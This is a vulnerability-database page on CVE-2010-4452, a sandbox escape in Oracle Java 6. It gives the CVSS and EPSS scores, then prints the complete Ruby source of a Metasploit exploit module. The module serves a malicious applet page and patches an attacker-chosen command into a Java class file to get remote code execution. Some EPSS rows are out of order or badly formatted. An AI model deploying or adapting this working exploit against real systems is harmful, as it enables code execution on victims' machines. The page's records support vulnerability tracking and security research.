CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Unspecified vulnerability in the Deployment component in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors.
CVE Informations
Related Weaknesses
CWE-ID
Weakness Name
Source
CWE Other
No informations.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
10
AV:N/AC:L/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2
EPSS V3
2022-02-06
–
–
80.66%
–
2022-04-10
–
–
80.1%
–
2023-01-08
–
–
80.1%
–
2023-03-12
–
–
–
96.64%
2023-07-02
–
–
–
96.72%
2023-09-03
–
–
–
96.72%
2023-10-08
–
–
–
96.75%
2024-01-21
–
–
–
96.52%
2024-03-10
–
–
–
96.69%
2024-06-02
–
–
–
96.45%
2024-06-02
–
–
–
96.45%
2024-07-21
–
–
–
96.64%
2024-10-13
–
–
–
96.58%
2024-12-22
–
–
–
95.52%
2025-01-05
–
–
–
95.84%
2025-02-23
–
–
–
95.64%
2025-01-19
–
–
–
95.84%
2025-01-19
–
–
–
95.84,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
##
# $Id: java_codebase_trust.rb 11983 2011-03-16 05:01:29Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize( info = {} )
super( update_info( info,
'Name' => 'Sun Java Applet2ClassLoader Remote Code Execution Exploit',
'Description' => %q{
This module exploits a vulnerability in Java Runtime Environment
that allows an attacker to escape the Java Sandbox. By supplying a
codebase that points at a trusted directory and a code that is a URL that
does not contain an dots an applet can run without the sandbox.
The vulnerability affects version 6 prior to update 24.
},
'License' => MSF_LICENSE,
'Author' => [
'Frederic Hoguin', # Discovery, PoC
'jduck' # Metasploit module
],
'Version' => '$Revision: 11983 $',
'References' =>
[
[ 'CVE', '2010-4452' ],
# [ 'OSVDB', '' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-084/' ],
[ 'URL', 'http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html' ]
],
'Platform' => [ 'java', 'win' ],
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
# OK on Windows x86 + IE + Sun Java 1.6.0u21,u22,u23
# FAIL on Ubuntu x86 + Firefox + Sun Java 1.6.0u23
[ 'Automatic (no payload)', { } ]
=begin
[ 'Windows x86',
{
'Arch' => ARCH_X86,
'Platform' => 'win',
}
],
[ 'Generic (Java Payload)',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java',
}
],
=end
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 15 2011'
))
register_options(
[
OptString.new('CMD', [ false, "Command to run.", "calc.exe"]),
OptString.new('LIBPATH', [ false, "The codebase path to use (privileged)",
"C:\\Program Files\\java\\jre6\\lib\\ext"]),
], self.class)
end
def exploit
path = [ Msf::Config.data_directory, "exploits", "cve-2010-4452", "AppletX.class" ].join(::File::SEPARATOR)
@java_class = nil
File.open(path, "rb") { |fd|
@java_class = fd.read(fd.stat.size)
}
if not @java_class
raise RuntimeError, "Unable to load java class"
end
super
end
def on_request_uri(cli, request)
#print_status("Received request: #{request.uri}")
jpath = get_uri(cli)
#print_status(jpath)
# Do what get_uri does so that we can replace it in the string
host = Rex::Socket.source_address(cli.peerhost)
host_num = Rex::Socket.addr_aton(host).unpack('N').first
codebase = "file:" + datastore['LIBPATH']
code_url = jpath.sub(host, host_num.to_s)
cmd = datastore['CMD']
cmd_off = 0xb4
cn_off = 0xfc
case request.uri
when /\.class$/
#p = regenerate_payload(cli)
print_status("Sending class file to #{cli.peerhost}:#{cli.peerport}...")
cls = @java_class.dup
cls[cmd_off,2] = [cmd.length].pack('n')
cls[cmd_off+2,8] = cmd
cn_off += (cmd.length - 8) # the original length was 8 (calc.exe)
cls[cn_off,2] = [code_url.length].pack('n')
cls[cn_off+2,7] = code_url
#File.open('ughz.class', 'wb') { |fd| fd.write cls }
send_response(cli, cls, { 'Content-Type' => "application/octet-stream" })
handler(cli)
else
html = <<-EOS
<html>
<body>
<applet codebase="#{codebase}" code="#{code_url}" />
</body>
</html>
EOS
print_status("Sending HTML file to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, html)
handler(cli)
end
end
end